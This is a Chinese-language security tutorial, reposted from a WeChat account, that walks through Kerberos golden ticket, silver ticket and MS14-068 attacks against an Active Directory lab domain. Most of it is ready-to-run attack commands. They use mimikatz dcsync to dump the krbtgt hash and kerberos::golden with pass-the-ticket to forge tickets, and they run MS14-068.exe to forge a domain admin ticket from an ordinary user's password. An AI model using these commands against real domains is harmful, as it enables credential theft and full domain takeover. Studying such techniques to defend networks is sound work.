黄金票据、白银票据与ms14-068

admin 2024年6月6日20:36:34评论9 views字数 1338阅读4分27秒阅读模式

kerberos协议访问请求图

黄金票据、白银票据与ms14-068

黄金票据

原理

黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户

黄金票据的条件要求

1.域名称 test.com

黄金票据、白银票据与ms14-068

2.域的SID 值 S-1-5-21-3911998785-1923830468-1006530692(后一段就是机器编号了,不需要)

黄金票据、白银票据与ms14-068

3.域的KRBTGT账户NTLM密码哈希或者aes-256值

lsadump::dcsync /domain:test.com /user:krbtgt
4fbcddb2c382d2ff788e6b88bc6685f4

黄金票据、白银票据与ms14-068

4.伪造用户名 administrator

获得以上信息后就可以伪造票据了

删除现有的票据

klist purge

黄金票据、白银票据与ms14-068

klist 查看当前票据

没有票据时无法访问 dc

黄金票据、白银票据与ms14-068

伪造票据信息

kerberos::golden /admin:administrator /domain:test.com /sid:S-1-5-21-3911998785-1923830468-1006530692  /krbtgt:4fbcddb2c382d2ff788e6b88bc6685f4  /ptt

黄金票据、白银票据与ms14-068

之后可以访问

黄金票据、白银票据与ms14-068

白银票据

原理

白银票据是伪造st(门票),这样的好处是门票不会经过kdc,从而更加隐蔽,但是伪造的门票只对部分服务起作用,如cifs(文件共享服务),mssql,winrm(windows远程管理),dns等等

白银票据的条件要求

1.域全名 WIN-OM48SNJFGAL.test.com

黄金票据、白银票据与ms14-068

2.域sid S-1-5-21-3911998785-1923830468-1006530692(后一段就是机器编号了,不需要)

黄金票据、白银票据与ms14-068

3.目标服务器FQDN WIN-OM48SNJFGAL.test.com

4.可利用的服务cifs

5.服务账号的NTML HASH 3a54b6e5168227fc55575efb4c2f21aa(一定要是带$的共享账号)

黄金票据、白银票据与ms14-068

6.需要伪造的用户名test

伪造票据信息

kerberos::golden /domain:test.com /sid:S-1-5-21-3911998785-1923830468-1006530692 /target:WIN-OM48SNJFGAL.test.com /service:cifs /rc4:3a54b6e5168227fc55575efb4c2f21aa /user:aaa /ptt

黄金票据、白银票据与ms14-068

ms14-068

原理

ms14068的漏洞原理是伪造域管的tgt

ms14-068利用条件

ms14-068是不需要hash的值,只需要普通域用户的账号和密码即可.还有对应的用户sid值,但是有一个前提就是补丁没有打才可以使用

域用户账号和密码

对应用户sid

域全名

MS14-068.exe -u aaa@test.com -p admin@123 -s S-1-5-21-3911998785-1923830468-1006530692 -d WIN-OM48SNJFGAL.test.com

导入生成的票据

kerberos::ptc TGT_aaa@test.com.ccache
黄金票据、白银票据与ms14-068

 

原文始发于微信公众号(CatalyzeSec):黄金票据、白银票据与ms14-068

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月6日20:36:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   黄金票据、白银票据与ms14-068http://cn-sec.com/archives/2824177.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息